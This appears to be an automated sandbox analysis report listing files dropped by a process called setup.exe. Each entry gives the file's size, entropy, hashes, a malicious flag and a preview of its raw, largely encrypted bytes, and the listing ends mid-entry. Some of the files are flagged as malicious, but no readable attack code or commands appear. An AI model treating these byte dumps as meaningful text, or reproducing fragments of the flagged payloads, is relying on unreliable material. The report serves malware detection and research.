              Preview:var W..8.9..!.t......x..'l.....c..Z....1j.6.......O.t.O.w{N...]..>d........r?.=wA.V.E....E.b..,I.O+t.jE..}.b...`y..< ....(....O:...5.....(./.B...e."7)?.f..J.4....4z..M.zu.x..+.lR....v.S...K.c..H.g&.n.....r..J..3".{.tI"...../P..wJ>...vF7......^.....G.....!.9.l.6......-..;.F.vhM......}b..g (^...:.&r.M .)X.....\........6..'.3IU..ME+..>..*..D9.....xf9...FOR.....2..!...+<.sVWw..HM..X./....1.,.v...\9....&JAH...D(...g...I..._.&..U...tU....&.....B!'.'.g.M#i.uO..o..8W..\I......e...>.s.......D....W.g..C......k.@.HH..w...f.....w....@...W......i..........O.Q../E5...v.....+e.e...M.uu..,.03.4+63.t..1..8..9.h..G.......F.N.....\......z.......6...v......n.b..w\C...OH9...D..vk@}.7F...v"..Y..in@.q..^..g.l.q..gC..z.g_jj.k*....j.s...s.U..-.4...Vk.DX=...k..wGK.....t..jx.E.o.m....]d[2..5...g...4.)"aC.sx:.I...0..f.~\..*v......$..i....q.H..|H..{Y'.VY{.,...@..1..}...f.+...~..yd .br.....[=+...=.b..,T:!.hkL4N.)@...U......h.a.*..oR5C"W....J.U].....]S.K.Q}F..L._.W.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):121548
              Entropy (8bit):7.998545182341693
              Encrypted:true
              SSDEEP:3072:uA3KTtsXyae+gT9iOpHyWLzYVglOdJkrNcqYZKutFsYn:uA3KGXE0jWmJsNcqYZKMFsw
              MD5:1CE7954AD71E9FFF898064C19F71F935
              SHA1:3D45700FFBF5A460E14265B38F58ACD23E640EE6
              SHA-256:5E38FF92ACB726C2263E2D128C112C4D9E29800CC9F02BA9EA33AA3BD13D308D
              SHA-512:09DCF59DC466DD64390BAE45758F1987E9DFCB4F5274F4FAC09A8B472087AA9CDBEF6C4F51BC334BA9378EC98729AB972695BBE00B359920D1A2DAF7EA090B2B
              Malicious:true
              Preview:/*!. e...<.tM'./.=.V+{.3..3.0....>..:T...*...9..]....5.H.Lv.).p.r..........U.i._.I.f.......:.....Y.....J...!.(...nh...x...K....\P.......I.R-D,.2..&.S....&...$.C......e_B.u.K@...E..}/2.d.>.j..6/k.. ............21.....Y.....O[+..U...e.R.T.}.i.A.%.h..6qYL...f.'...g....~..........N...B.....d.-.O,.....'.....`%....u.j.?R#....d...cN.-k.K.<..oj#O.Tr..f....1....1.......KU..L....=..2...t.-/1..u..fP1x~B9J.;8sbNl..2....E...B..,..M-.Tq..@..\.zb.w....b.:...R{.."....W.....D....,w..O.....e...z..c...........8...}%.]Y.P...P.q....w.......4..3..H.*.J/.....C.Z...:.&3.WC.T..!......bE.....a ...|.eNv..t.~.....)r..8).O?B..`.%...........e..:...&......&.X`...\....=z......M.f..:q....,dD....k.......k..2`...."Y..X..Y"$.....xZ-*........:X..U...L.1T9;ZTM.tK3OM....C`s..q.'.g..y$.t-..k`..e\.\^..U1.B.2({.[.8.9R...7.j..."h,.AcZdP8K.V......`...bhNxY....~.h.........+|Jy{.......4!.p..$1......5.........CNL{9}Q..X...._.."&^o......s.`y.@{......X3.......C{V.eAk.@..@...}b...-
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3484
              Entropy (8bit):7.9487065971614275
              Encrypted:false
              SSDEEP:48:NNPdfPa4ZKoYAppiYT21+TcQ0ndH74AnfSgyKZQUAurmSdURlI5cA4rr7FD:P6JA7B2ed0nR748yKZ3AurzdYID4f79
              MD5:347F4132CBD6474A1673F9EF7C0B604A
              SHA1:09365AB53E1B8BA8430736895CF7B426BC40002B
              SHA-256:4D822DB87B5D0C8CF5A386BA9C4C0430BBB7AF096C64D105552BDC7D80DF9D31
              SHA-512:98F5204BBA93D5A809B00B7035490D9DA79FD0E34D6E2793BA80C16316467A71BD4866722901E8C39F925EF14298917B57A8854B70821EC512F6FC26C695DE93
              Malicious:false
              Preview:CACHE.l]....ruh......R...N...0am.p7s..j>....r} .........\.....n.0..I3.w88W.X.>!........L....^Y.O_A=g.....1..U.ru.dc^Pv.N...Ar.]t..,..$..........~....,.`..k...0..s!............J........T..yF!I".l).T.X..$-.......f.&.En.....2.k...>.m.g2.km.A....i.qo...0.0X*|.(.i..5".ZP.d.......K..,.l(r).$..j....H.]z..S.._9~...`T..s.{puu.s.+....1.+....+."...g..?J:>..6.|....(.Z)_}.j...........s0.......@QL..x8.RSrMu.C0...5..~\g.nnL...+.:'.>....z..s....7.,..J.#03...Vq{..DX...!.s .....;1.FZ.S.>..&.7....Z.^.Af....../.....=..v.~.j..|G&.}a.`.._....v..[D.q.f..T.O.MU.h...,....,............Z,.`....s....b./X..k.../....h.2..................z'.....x...q......x.R!...3.8bh]c.F.+..U>.x...P^.D........l....U..T3..A..M.......5.g...:j. ~J4.....M..Os3.~...?.L... ..f.s$.r.+...3J......P....S*w.'.&..j..KtBf...~W.O....]9K...P...r..4f)q......D....$l.H....^.-.(..WX+N.Kr.......e.......L[..T..];.E..s.#1..\.:qiX.j......l:|.'.....3vO..a...Zn.RT.L.t..*..k.=.Im......x.i...l.........)..m...-.yW..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4070
              Entropy (8bit):7.9526250043101046
              Encrypted:false
              SSDEEP:96:NDyu9kc5gKifM0VfTRR9OksNrLboJZy9PAHtnWXKm0O4duqr:EgkMgu0hdR9O5FoJAUG0Osl
              MD5:CA268D475ED2EEFD7BA145C647DD59AE
              SHA1:703D9CC59EEFD09A66447D0E2FEAA70D7B1FD2E7
              SHA-256:4FD3138D671A8DDDC5E2569D938624239FBC036307CC2E3B0EAF7ED4EF8F0DCA
              SHA-512:1D940B8FAF13413557D2558ACD8EA8DDC9EE0149A45B72885BCE7B24A6D0FEF418583D34C54AF943A07B8419151F4D7A56D8F82558E89314AD21550849708860
              Malicious:false
              Preview:var W....!.m..w.8....b.j..k.}....8.L.r..]....{.#..`'.7..`.....e..@N..L.+rHD.a.. ...R.@..3w#j.$w.5Sr\.w~.rTK..$E|..../...#.R]4.'..p..(..X.0bX..7k5...]..9..|.U.........+......_.I.F3..|6.z,n...c..f.,.k...6<kY.q*...@.\{*.j..au.A.!........900..z.........T..h.zh$.}....V....+u.~H.r.....Q.C=..U.jz{....0;..8G..GT?.kr.c.g.#1..c.].p...wmw.......7..Dw..U...Mwz...._.k....f..N9..!.....Q..K...U..i{!.7u5........oq.D..;.N......G.aju..E..aP.:q.T'.o....i...T^....C.=....8......_....s.@Q.....W.,..u....B.T.......G..B.Y./L>2r.Y....6.}.\_.\f..........79,]......!#+.7%......B..J7.y...M~.-......Kh..KJ.Bc.....^..P.).......=..z{......ux....JQ.-.FV.d`..X...............g.......Ir.....5.#.WrJ.Mb.B.[m>'<..O2c...*b.0.....%..XE#....(.<.hC....q...g..|.NNl.L.........2j_...OFd.........C.($..s.....S.o. ........(....!... \U.x[y......RM.....m.-........n..K:wl..E..j(..G.9...o.=2P...1..1..=..t...`..T.`..rrD.IJz..{.q.p...u..`-...9`.J.d.A7b~..0TO$...3.....#....)....w.X.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):290621
              Entropy (8bit):7.203743125563485
              Encrypted:false
              SSDEEP:6144:Qfh4qe91mBp9z4A1RwZtlUCnZWHDH8HDHcHRHOHVjbUq7jdBBVbKyOqaYVHRRmGq:K4quupd3wvlUCnZWHDH8HDHcHRHOHVj4
              MD5:CA2E57D3D1BA856576FC3F82166DFA46
              SHA1:38F876EB358D5675E842A9E1B5B520954E192A00
              SHA-256:07F776473EAE4B937AC2C52BFAAC82C95037142978DB1B05F0250A37E60EE824
              SHA-512:637859AFAF032B8F966C966F87C199AF4C526363A5E031AC376DF54803AE7B50A699EB80A181431CC7F1045578AADD1EA5CB4D1899442D384BB449858F2F2DBD
              Malicious:false
              Preview:#topR.S.....E.Z..n.".....@.<......|hx.]......[W.#.c'...Pyv].Q...O....g....[.P..<..@..R...@...dD...),.?.}...`.9....N..G..].}.K.t.~...;...d.Q._.>p.....E.....uLf;P..}<.B...:.5...k.s.R......c..+.y..S.[..3...a...:7.=.X.q..Z"t.H..rY]k..7.{U9.'I...-..R;.].@1.H]3..k...2.w)fr...gxx...eI.M(w.2O.....]B...6.#.0.be.8)..M....O....%#..k..Yeu..[.~N......c0wD.............8.$..r.tK.sN R.k.}....9..a..l.F"Pe..JZN...V......e..i.k.......`...^..+A.y./|A........(..X..JE..i.[.......gnS.Z..'.<"..z..3....y...K9..p.v@\..'&.....+...-K[fQQ.T7.q....C....t`>.Wfl.....bw......O2.o.p....x~O_..[.*8$U?...s...s..!.6.....q.f............H.....j......]&.U....;*.%a.EH..TT.`pf..-.\....P...Xn.^.2p59Z..$8..~%.Xa1.v.V.Q._.`........q=.`...m...v.E..]I...,....I...O............vwE.GJ..^...G..x...v X..1...v.a...L.>................l.r.j.O.<V. .~.q.u%.....V.8......!.FD.m.9......k..o.t..,..G....K{..^g.MXK.~6......Q=c.U...r.0.}.O.HZ.R.x~_c.V..`.VL.I.fM......Ex..!p.b.....X.xX.]..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2224
              Entropy (8bit):7.918743568662704
              Encrypted:false
              SSDEEP:48:VyHuHu613ccH2UuAx4Und7S6GXerdyKq/57YwnVq0pTOED:VyOHN15WLAeeJGXeSTq6OQ
              MD5:E3C9CDB261EBF2BBF2A0F6817D7F68FF
              SHA1:3D1EE22B62FB4A1DB0F0EF991DD0B54E1694A4C7
              SHA-256:18BB4268D46CD5F6612D0A4D074B6E92D0AE8B5F02FFF4CB1FC4643FBCB26E6A
              SHA-512:E3CCAB1A7EDBBE41187F1E5044D76007C0E6C00A9A3EECE922C97521C6AA80AF01CD792B5BAA69B7F49D723C5D8301946BA9D48FB6ED0F2C00683F07995FC79B
              Malicious:false
              Preview:var W..qs........,...S7...>..tLN...;...(....+&:..=9...O>.8..\.%.3I.F..v.$...h..hM.J....].t3gP.C....&l7..$\g.\.tG.k.p SHc.).k..|'t.}.kyM......lm....Tz{.Bu.Qn..3....hB]...2Lj...K[..W.....c.Rz..w.)T,..r.|.5*.....y`3.%.%8m...o...+A.|....._d.,....Y.......a..Zc...a.....:a7...l..%&|T.o..`..2.z..}{]o].3l..ze..}bn.)...E..w.W/.ph...L.=...;...2t....~M...os.W.h............9z....HE.h.<b..Q..e,3...(...[..%. .dg......../h...^....(W..o1.{.:....;&......g.b.D.te9...M{...W..#?./.a.....Rt.n6>x..F}|...My.m8+r.bZf.T............17.....m.<n...F...B..+(x...K..wr@Q.G-...>.$;.}....I.S....@.:......U.a..PYE..bj\.=.jT.}3....4.F...ic.ykk..O.D.\..7.1.M.D...d..m.7...~...d...._.*..x.I].......+..t!#........g....9}.8...0......cQ+!.l..<..`.L..o....C.....3|.!..RuU.~...N..S.Z..D...SJ2....E...M>`yE4.....hQ.D....:c.?....#..$..gfn.q>.Ig.~/.U..4-.....?.(....D.-........Z...F.m..;x.$h....yV.K.8rlp.qO.O....... ....1.Y.6R.6..W.m..*x0.;X....?...s/f..[.J&q5p..\...m.Z+...c.6.yv^.t.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):172728
              Entropy (8bit):7.946256419165024
              Encrypted:false
              SSDEEP:3072:79WQrt/B1vT3EV8Z3afLc3WjnVmNH/P71uJnWE9M+g5hL8eD08s:7VpDEiZqwmrV8H/P7skoM+im
              MD5:B78918618FA215DF6194B7B3E2573DEC
              SHA1:C3ED59E761886B34647AC6C8740E537916760E3D
              SHA-256:F22D5183BC9EBDA49D2D0A52EFC9B9F341BFCDAF86B3D45A425B4805511B4472
              SHA-512:D6154A102079D8B6B4CE63D05E4899556D10086570F249D597E8B656C57B945CAA10EF8D260164D2ACC4F6980DCE5C7ED30C275D8D7E63EE4749872B8C5E9CCB
              Malicious:false
              Preview:"use ..b.,6O..g.9.U.D. f..>.N...M.+# ..!._......3.... .D.*G2.i@fZ......c..HH.d......j...I.........&...Q=|LYq..'....l$.m#.g.=..).B.....y[......b..M.....|lLs1...8.[........`#..A..`3.....y4~.B.kL..1.5...w.LM....}:....%k._h..Mr.`..n..r.eF..>..X....f:.X..r.cH.cT.......~M.....p.._..`...4.0\...".kbc.9...E....../P!.wG...Z}....\.x....(6.r/..;UefEz.ri.x2..`..o....LCN.L0..w.>..pP7.D...E.Fy..=...6..oQUwe.. .x...p.8..x...W......5.......z.?.-.....h-B....%~.X.&.R...d....e......\.b....L..|...-A.<...G.7A..V...............d..I*A..K.[."DR4....H.|...*...*q..=.lj..1..D.%..C.G.==.j..^M1...Y ..(D.9....}.i.<.vo.s..........2.hm.,wvXJ..H6h*..........!.91..~.Zo.K.Mk.#....<L:S[.{\..L>C`.U.z..l.e..}.HC...VO)..GR.%#.8........p\..7.L..0.9...G....v!<.3..l.7!.....\..Wu..g..n....L/.|k;..{...7. ..?7...kH.M..4Q]0.../.....!./KE...i.._....7....\Z.T....gp;>CW..M.Ty....B2Ag....5.|..QG......\.8.;.Tv...x.q.,..c..s.hyE.n..0...?.K./..*..u..L-.....#}].(q...6.$DF5.r.,?..C...[.g......i... p!;.4.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):14700
              Entropy (8bit):7.986750306994535
              Encrypted:false
              SSDEEP:384:IyG5B2snPop7tGs9zK/tmu6/l6NSTwJgzKv0b:UzYGs0/otNuJgpb
              MD5:4ADD8CB9FBC91C2E411D4DA8595848D6
              SHA1:8DD46117E5563D019F54891DD8664A2E859A23CD
              SHA-256:AF3DE0815C8E1C53AB64D9DAB66AB762C48E61BAEDA29657E25F1681DFA3001D
              SHA-512:60F5C3E07B7CFDC53B0EBA4628A01071D311304E95098B4DAC4CB787ABEB8BA6B6199B9D24A0559116E749A7F5984326DBD377CDFEA89C20CD023E3FB2B7CA31
              Malicious:false
              Preview:var W..?.x[K..Q|....gt{._.8..Bv %..2Fx.....Sa..\..A...V5t....._.\..0..S.)3.......[.7.`..[.i...C.n...A'.C...3.6.{A....d......R.;bz,.....j..3T.`.d..%..o. .=k.>Y..5....#W......pm.|.zb.q..h.aeJ..GE..6..g.6Q1..UZ..Hn!...7.;........e....g.`.......uq.t......?l.fG...bW.q.0..3~..w....Oh....:. L.c.I..8(.W..C.....(+t...%K...>5...H.F..(..v.x...}.].#.kW....Z..IN9g..8.1kf....p..l.6.)...<9..{.}.Z...9........y.]..r..x.`&...L...p<....Qf...%I..........7...M..I.`~.C..Z...4#3..VX.our....r4....OE.b.j....%..m.,]......~.g..%...3.mW..)+).U...X7z.p\..U.. .~..+G...p.,.B&zo...&~..6......<p.........$...wN..[x&..J...S..U.I.....b...=cI...G...s.....y.4*.....e.....F..n0n'..znj..:..u...=..(.^....'#8..;.J.p.l^.:..... ..8...8...Xz.........).bs.s...%.yo'!9....j...o7..#r...p.tt>.n.I....+..t.|Hf.D...ZI..U........+...#..jSt.r..+...U..[.a`1.N...B..m..l..j.D..8i4.=u.Tq.7y.]..~:.8.....Qt4...._.m.@Y.z.8MP.R.B.X>...HM.9 ...Om.......N*V..+.Bm`.{./+.s.".i.#."....3....5..e(.`Tt..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1825
              Entropy (8bit):7.880040400428908
              Encrypted:false
              SSDEEP:48:TbgrPOOKC5Gfz0e5arR28rs1OLy5wjobW42pOfD:fgSOKXsr/IOLyiUbWDC
              MD5:DAE664C60C9187F884A4372B0C51667F
              SHA1:4CF9DE8EDDD0858FF02E440BAE4B20F622723DB7
              SHA-256:68B5A8A088E7C3EBEE9C8813D29B2EBA78A25FCCB18C76F465E31C25AE84EAB6
              SHA-512:56ADC92408A925EA5BDF14CF230D3DDA049DDB04E4EBB352ADDD19858BD09CFBD3547030AFD25F425348EDA9239571B69674B52EA46499F70BE5373AA6D63275
              Malicious:false
              Preview:var WH..z.....9.;28mm,.T.......-.....|,...83._.,.h..bAQ .M..v.t?.y...-.s\...?...XS.a...B.6...h6.X....,p.m...;&..K.D....(....=~....3."o.y..Q.M.gL8].....ro.].........M...&...V....{5./2...l%cBq.._._R.n..#.O..V.......$R<v.....M. e..o).R{tM25vx....r.../........X.P&.<...v..\yQL..o..]o ..(.L. ...BH3......5...q\.+.,.(.lDa....R..=..L?..=.'0'...L.d..$....1H... ..9b.a.]FVE.........Lc;......ee..*m.......*uS6..$......!.hN....V..g.rz.......q.j..(b.......Pi.?.A.+}.....]....... ......C..(...'...b..O.......... .8..j...?.1.T.CQen..nF...=.k..6;....D=..3Ck.....k.5..lY...~.v.=...9..\x.k}"#].A..".Z..f..QX..6...\..t8y..V..D]F._.........H=Y.&./$..L".*....$...6.y.j.8+.r..f5.6./..ux.....O..P.zQu.@..XR8._.J.&...D......b..kT..9V..]o...E..k.,.k;.i....o..z0..8...>r..1t......r...g...y....".R..v..).}\..[..*..n}.3 .;.7.l.H..$7.'@.c.y...4e..jVN.Q....}.u.Fx..^...........g"..ucX.. .4.|.$.@....>.)....W....G..2....;J.|J....6<&..cq..?Z..3..m.(.+.Y.......5-........(L......].I.@z..-.......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):7794
              Entropy (8bit):7.9775522451224745
              Encrypted:false
              SSDEEP:192:b/Qgm2/3tFPB9lLc3z44ivIyqYqpkepY4TXjO8AZZzlj:cgH/dF3xc3s4iKF6wY4vHQZ9
              MD5:B14BC649FA2E61EC3D4C9B6A94C1E9F5
              SHA1:F6DEA0AA0E69686EC826B1E45C8ACC1B2A6C75B9
              SHA-256:B0FFBFB51A3AE35AC0F7EFD982C974C506C0F7F6B672F2091978A669F201A367
              SHA-512:E8652CB8D16C46AD86344E7DDEE0FDF3615E2FCEC167FFD1759599006A204248DE69E563E618EB5E7A1EED6C6AB07DC6482699A9673877AEC4A32D2C31B15E99
              Malicious:false
              Preview:var W.........C^Z....7.sV.S.....+|rfY!.d{.........h...j..Z.i.6.xw........Ca.B.|hB/.g.....X.w..o.."...+...8.....J..,.H.V.S.....Y~..b.<.~.\N....(WC.p.fL...........]xB..7.$......H.b".m...mzG.#..yJ..K..o#........K.*s.?.^..+'....d.,...z........%FSd#>...'H._..K$.bU.Vs<.<=x...*...K.p$f.j.OG.|i{.dDX....N....{w.l..4Ce.1.p..8\..u...U.R^ ..{..a....{...zM.q.@...#x....z.....J..0.)J@.>w./....W.../k.'...O.9)cS).W.........{.3..d{5.\j..n.M+B.......i.(b..X.}..W..`..?.j.x.x\Q......4mv8 j..S.xaHE.i..+I.C!y).%...3....B..Y..j$.g.|.Fw...e.....7.E...]....d4,.......0.3A>T/.[....%M..b.D...G...........9>G.&...Ld...Y.Y.z-....f=,...M{...D..c........._...2..u8H..q'.Cf...tUg.e..b.Xmz.l....]...3QP.....rd..lgw.9.D4C.Z..K.6...Wq...Z=.`,...Cz.u..4........).N..b$.J.s...^w.z....#.....O.]e.....Ss...3|wI....-./....=...}s...b./2...X1....#..>Q..P.....q\|..k.......4.'.Ti~\Y.....L..[_..|..w'Q=4..&..]...^.oS.2..L.E..2.-A......,.4R.$.,...%.<.qc.f..}.....f....l.d..N..db4I.9.K&.'...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):44680
              Entropy (8bit):7.996172708120914
              Encrypted:true
              SSDEEP:768:WrFChVDHCgIsNfG8Hvdd9cVkHV8swGfpRHqHrQ/bo8Lq92Ci439PXXx:WhChVDTZbyVJtQHq8/dMi439XXx
              MD5:8C8ABF4F5E826430907C30F1C9563A57
              SHA1:1C482E510CDA6713E1C60544C5B5C2A26BC7B5FC
              SHA-256:EF3579812665062EB422DF836B9D263BFC2A5BD512E65DB0FA9B17CCD8AEE8CB
              SHA-512:87E23770740230CD17B64845FFB0909AF33CBBCBA7A64E36EC0AD253AA26857BCE717C03FF98E0C43D3D15A91381301135AD05EC377C7E41A8BF544902B3207A
              Malicious:true
              Preview:var M....`".S....!+..<53.....6.xi..bn...Vf].e..L.v?..O...,$..%..Ve..0.'......oz..)....0.ZS....P...O.._..........:..1.*.fFBF^.6].Wh.P.+6.(4Y...`.|D..s.J.q(.>.W*....p.&.I.....f..>.7C.Gp...K.{x8.D..8....X.-.^.d...8xA6A.;.V.*/2.N'/.Jq..6V.?..S>.U.)......:ABW.<..[..<.WaC._l.. ....`.c..)....!.0..i..|g....r..|...3L...7# A%.../...fx$..q%.s<........ .rC...4/..n.:.e.[+<.6S....Gd..h..E..=7...L..B...'|....{^<.D.).X.".C7....J..`..6.|.....9...-......N..8..+......(.n=...2B...m.8K.F.1.iaa..E.;T.2....G*Ah$..0.#1..(J..0.,...J!..^C.zTg...3.?.!5.y...g..N.t..&.$......P.7..."l0...%*.Q..G...Y..0_...G....b.q.[].T>t..v!..x..uq.3.J@..%*[...8s.`.....O../...(......L..].h.c.0..E..n.|..-..........K...d..Z..v.=.=..g.@]..0...Jj..g.'.-.F...:7..t6..G{....=.....i. ....{UHX1Y...*.RMR.$...e ...>......9..`.^..h.esv".....cpv...#C..s...:.W......1i..ZeS..,...DP.n..(.g-..*.G....6....s..wns-.H.`.D.hK....#.Mr+.[..TN.m.P].|...S.V6..6>.;Qlv...P.........@.G.<...<..C.NT>P.v~...?Wi
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):6235
              Entropy (8bit):7.96735628285401
              Encrypted:false
              SSDEEP:192:I3jj4b53XS48AH/Ru1GPfIerSU4rnyaq1dqkG8A:MUbs48o/Rum5rqDyPdqV8A
              MD5:5055DD603A2CC9248E28B65FF09EB150
              SHA1:367F3FE98560F4CD6D8A67055DD1B6758B3B46ED
              SHA-256:E79435D127BBFDD9A65BF0CDB9F45659AFB7CFD2B731E5A6C72AD49F5DD1F1AC
              SHA-512:4805B76D60F203929D656464CE4D117A3D2B6172C24DBCA9065DA31D6676AC37C3A9BB30EFF543EF9FE45401DA2BCC26997C382FD08EA31BDDBBF422BC1E37E6
              Malicious:false
              Preview:.b_se@..7..t`.....m..6L....Z4...j.}*y..f..........4L.T.....Q.!i.H..V...EQF].....L:.Qt.t.?D.J..rr.7....*a.`.F...U..Y..^.:.<.O..LT0....o.+..!"v....B.).\....5f8....7%q.....4..."......I..B$>..0..Z..b.cm...?...h..W,...?.!.?6..O.EL...7..WGN.T:e@..K".D.5Z..s..b..<..YL!Z..........CQ..x.;Rs...*.{.6..k.aTEE..1\...I.u..\.....&W.h....."..Q....%H`..WQ.jV.....L@.A...c.8.)..R....].h.i.:lT..0.a..j..?F.H.h..p.I..Lt..Hr.o~<.2E.-N]^.c1{...N.L@.<.`B,.p]..-.-.`.Q.v.....Y....@..^...y..Z.5...4....%*........fN2......Aq..l.B$0T..4..e...G..NLD0...5..Qn....cf....9..1..'.,...[2..%...U.G....Z]8..B.f..sBR]L.E.M..[.M{.r.P.......S.V]?...:..L.]a-.....#Q..kF....H..c_..../..!....U..XYA.J{.i[.&..*.....!.)x...,...+k..+I.>!..^.:.....,..#.dN.fs..pj...C.....R{..F...._.sU..H?P....;.>........w7.@K..).RO.n..A.9K..2..|........[~........H.i.H..`+<.Gd<.F.5.Y.n2v......S.JQ5.9..h=..?..C.d{..L...g.tW.&.....V........t..R&V/?...ET..V..$.v4.@.....Q......30...EU..r?l7..9..-.*..G......[...n.G....6.*..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):67448
              Entropy (8bit):7.997165094516034
              Encrypted:true
              SSDEEP:1536:5q8FCNTYIL2YniYVYzTNbdX2i3jI32R61t4Ko8uMkMJMAZ3efCeDS:X8VYU2EiGAFB2ik3Out4KoEnJMAlefC7
              MD5:333AE52CCAF407D4AABC0E93B4759EFE
              SHA1:EDF2A868431EBEBAF6EC405B6CA8E9CF4A79A95A
              SHA-256:BB8A3120D357B0EC29FA617B492A2B7C458CCD6F9067D26E6E1B47E78778A789
              SHA-512:391AC75895D5E57C822B2254DE15B189B6DCEF641B150CF42232588E02EFC1F250D5C1D2844A720AC33FA819EE59131B65E0C71E0CFBEE764B211852D166BA83
              Malicious:true
              Preview:@font^.gX.:....;..$..5..g7.J....(.l]...{...:0W..'.......<z...W.y..t..P5.t./}z..AvY.,.NF...@.{..B>u.w.w.WYQEr.x..%.?....d...|...J..44........P.bL +.h..;<.2d?..<.&8..^....6..:%(.&..K.0G...G..6. .......^R.....6tN/...;.2..U^..5/2..u.`...I.....i...v=..%.....t|h.zRq.A..&-...j.T.F.h..#.`.yo....P.-c...............j.;8.pr.3...4.,oL.\N.... j...=.{.n...Jt..U..A....v/)+..O..]../.vJI.|.5.I..\....P..6..>.E..-%.K...z.CU1..~.....ucc?.....r.^..E.:Q../0x...aXS{...c......Q@..K,.]..K..3..N.C/..{......8a...j....Y.......Z..l.....u. 4...H-..a..4E....s|2._i8...c....hJ".8R..x.I4Y..^b........u0.U..E.{...lD(=........Ap..a.M..J...W.}2..##...oz.B....M.....L..'.:.......j ].......cN.a ..pP.W{.F.$.IQ...p..2..Z.i@.UN.Y.....R.....5.a.e2...{wO.........MI..J=Q.4..z7..d...#6..k'.5.u..E....J.).%...L.....Bp&.p.LYx.~.a..8=m.x.....}x]..W.S..'.d+%R/.+^t....kbz.U....YlY..........2.m+=p1.4.....o..?H.....m)......:.Iw..Bi....n.`....;n.R....#......zS...X.....T...}..f(.!..R4/.E../(m..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):40292
              Entropy (8bit):7.994810514888828
              Encrypted:true
              SSDEEP:768:/Ri2DfCX5lgQAS6mCexiw33rbC0ZRM4ygM8lcCquO51jIQLhtMTXq6BzQgmCD:/46C/Afmlx/q4ygfOC5OvzVtMb1zQ5CD
              MD5:5058C990527E79539B838F8A07A25B8E
              SHA1:603E538ACD61FC210AC167B112D6C02C0A980EFE
              SHA-256:3C1B7B75EE1C459F1490340ED0DFF755703CF85B5493BFACA7CF44D55752BBD5
              SHA-512:73ACE0214F257FD0DE18BFD187D842A04877C86BB7320E24424675833DBC72D7805794A6C06FE706C227C76AD90414DF119F742A82F8616965B63103D4575CEA
              Malicious:true
              Preview:var W.J=.p...L...K.g..a,...>.. ^'.!,A?...&....,x%}.c..t{...U.I....y.@8.....4.B.=1.k.....R......R{.+.........*..5.Z.7....6.J+....v..`Vgc..=..i....D..y....[.9.^;.u.f.V.+M.]Cx.+..t.(l.....;b.k3......O.. ._.o.....A..E..~~.([...$].9...Q...X.....y}m.....yLu..Z..e.4.w.bw....Q}-.......Q..........H.PvZ...~....iJ.}.;2k.\n...x.7..H..U...l......$.+...!A..,\A.IB.......r]..B^..]...8...K..$...o.?.^.O.U.c..{=.Zp.......T..KY....m.M......$.L)z.O..0............7H..$...J.......'.n...2.".Z)..RN.v..:.p|..Px/S...\.H.:M....+FA"9O.}z..f!Q....<..2..}......l(@..a..EA..L.._.+C;RL.]...?U.,].&.d..........<.\.'.b...S.R.g....geKc...'......(.hD....../.R.^.>...E.1..j..z.*.......u,%......k.4..3V./.<..OX..fk....S....9.......jw..'$79..S-.J..I.%....N.]....i(.P.k5.x....cH.{y........b..S......kxo...m....X.n._.*.u.b4.m..=I^...E....<..R...'.R.f.j........F^N...~.;..`.@.^.. ...0..f..bK.;.....y..0..e%N#..}>...j.ZM(..7m..x.>jB..*Q...............&J....GdF{4}s..eE.{......o.N.@y...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2193
              Entropy (8bit):7.908608646831757
              Encrypted:false
              SSDEEP:48:YPxgWBdUjE/Q90tI/K1IEVKkItz4xxem59iz6bnWkV+tKzBD:YPx5BdUj7imKfKltkxxemDnWkxzp
              MD5:589680268870972448EFF13613FDCDC7
              SHA1:EB96B1D01F32497969173E943A6FF78B130015B3
              SHA-256:0DCD2038E5F9D0C5276BE5298D4CAEC0E29A267C6AC482F6F8B79B9998420110
              SHA-512:5C51C637D80C95BFBEAAF34EDFD4742DB03D5B261096A951D352F02F49D8FD5A0D8DD3A91327A6CA81D25A00B13520AD7560DABEC33826B325839899AE95EA59
              Malicious:false
              Preview:var W5E.....9.%.!.z)..G$...g<..V...r)i.....M3>...|.......DlR.B...u...y.....0...Z#....Y...Q........o.q.<b5..p.7..D.39..:.......|..I_ L.b.J&.C_.T$.R..}8.rX.y.8I......$?.9p.+W...hS7.....4xb.R.,..$r.*...t..]....5..k.H.....(...h/..#*....Z..v..}..X........(..`.F.....6F...F.1r........a.U..n;M*u.wE.I..s.Y..."...(..ha.A..N.8.@A^PoR...-`P.N...6.P,....r.Pi..n.%'z.,%.....d.I...G.)...:L.......m."a. 2.7cIv..z`.?.[.b...A.........T\;.h.~.t...o..k...}.wKDf.4r...V.H.uk-.*........2..a..DX;^.u....e.7.../..m.....&..miJ=.\.<.c8.....[....j....^.....X=.j..@%.F.*Q|cc.3.......&d..q..`...i.?H}3H..XsH...X...t_0gA..Yq..Te.X..d.F.&.......].....4..y.?.`y.2...M$.g.:...._+...fLP.4@...0X....).."....Q..d4(..:|....L4 n. P....e..6kK...Fi..6Q......,...Vi..}...o..[.8fA.6&.j....$..'..{..*...n.............. .=.(...W..P*.".......>...@D.@Y/.!(.OQ ,..'....y....4....dO.D.}.o..q.}V..S.;X......//...5$a(._OO%...=..jtit{..p)VQ.\B..x..p.T..8..X.zZ.KvK..H....(O3.. .J..~...q...B..N...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):447
              Entropy (8bit):7.453192866006216
              Encrypted:false
